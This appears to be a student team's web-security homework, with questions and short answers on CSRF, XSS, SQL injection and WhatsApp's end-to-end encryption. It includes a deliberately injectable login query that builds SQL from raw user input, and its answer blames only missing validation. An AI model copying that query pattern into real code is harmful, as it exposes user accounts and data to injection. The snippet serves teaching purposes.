- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? and what is the attacker’s intention from it?
- Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?
Team Hakimah, Abdullah, Feda
Q1: CSRF: Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. For example, this might be to change the email address on their account,
Part 2- The malicious site contains a script or code that sends a request to a different website (the target site) on which the victim is authenticated. Because the victim is already authenticated on the target site, the browser automatically includes the necessary authentication cookies with the malicious request. Part 3 : because the attack typically requires only a single click on a malicious link or interaction with a compromised webpage.
Q2-Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. The connection between XSS attacks and cookies/sessions lies in the fact that once an attacker successfully injects malicious scripts into a webpage and a user's browser executes those scripts, the attacker can potentially access and manipulate cookies or session data associated with that particular website. And what are the two main categories of XSS?
1-((Persistent XSS): the malicious script is permanently stored on the target server,
2- Non-Persistent XSS:the malicious script is embedded in a URL or another input field
Q3-SQL injection : is a code-based vulnerability that allows an attacker to read and access sensitive data from the database. allows an attacker to interfere with the queries that an application makes to its database. Part 2 : This can lead to unauthorized access to the database, exposure of sensitive information, manipulation of data.
Q4- There is no type of validation input parameters(username and password), can lead to SQL injection
Q5-is a method of secure communication that prevents third parties from accessing data while it's transferred from one end system or device to another. App: Facebook, WhatsApp how they using it :
WhatsApp's end-to-end encryption (E2EE) is built on the Signal Protocol, designed by Open Whisper Systems. This protocol ensures that when you send messages, photos, or videos to someone, everything is locked in a secure encryption box, and only the intended recipient has the keys to open it.